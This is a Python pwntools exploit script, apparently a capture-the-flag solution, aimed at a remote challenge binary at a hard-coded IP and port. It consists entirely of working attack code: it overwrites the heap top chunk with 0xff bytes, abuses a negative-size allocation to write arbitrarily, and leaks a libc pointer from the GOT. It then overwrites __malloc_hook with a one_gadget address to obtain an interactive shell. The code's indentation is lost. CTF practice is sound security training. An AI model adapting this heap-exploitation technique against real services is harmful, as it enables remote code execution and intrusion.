```
from pwn import *

#p = process('./chall')
p = remote('139.59.252.147',17011)

#pid = gdb.attach(p,gdbscript='''
# b * edit_profile
# ''')

def setup():
p.sendlineafter('username: ','aaa')

def create(name_size,name,content):
p.sendlineafter('#> ','1')
p.sendlineafter('size: ',str(name_size))
p.sendlineafter('Name: ',str(name))
p.sendlineafter('Content: ',str(content))

def edit_username(username):
p.sendlineafter('#> ','5')
p.sendlineafter('username: ',str(username))

def edit(index, name, content):
p.sendlineafter('#> ','3')
p.sendlineafter('Index: ',str(index))
p.sendlineafter('Name: ',str(name))
p.sendlineafter('Content: ',str(content))

def feedback(size,content):
p.sendlineafter('#> ','6')
p.sendlineafter('size: ',str(size))
p.sendlineafter('Feedback: ',str(content))

def view(index):
p.sendlineafter('#> ','2')
p.sendlineafter('Index : ', str(index))

def exploit():
setup()
create(2,'aa','xD')
username_one = 'a' * 0x168
edit_username(username_one)
ffs = 10 - 7
overwrite_top = 'a'*(700 - 8*ffs)+'\xff\xff\xff\xff\xff\xff\xff\xff'

edit(0,overwrite_top,'aa')

feedback(-1340+160,"")

create(20,"\x00"*12 + p64(0x404008),'b')

create(12,'A'*12,'')

view(2)

p.recvuntil('AAAAAAAAAAAA')

leak = u64(p.recv(6).ljust(8,'\0'))
print "leaked libc == flag: ", hex(leak)

mhook_offset = 0x00000000003ebc30
strncpy_offset = 0x000000000009d980
one_gadget_1 = 0x4f3d5
one_gadget_2 = 0x4f432
one_gadget_3 = 0x10a41c

libc_base = leak - strncpy_offset - 0x189a0

malloc_hook = libc_base + mhook_offset

actual_1g = libc_base + one_gadget_2

print 'libc_base: '+hex(libc_base)
print 'malloc_hook: '+hex(malloc_hook)
print 'actual_1g: '+ hex(actual_1g)

edit_username(username_one)
edit('2',28*'A' + p64(actual_1g), '\x00'*100)

# edit_username('mamatijeata')

p.interactive()

exploit()
```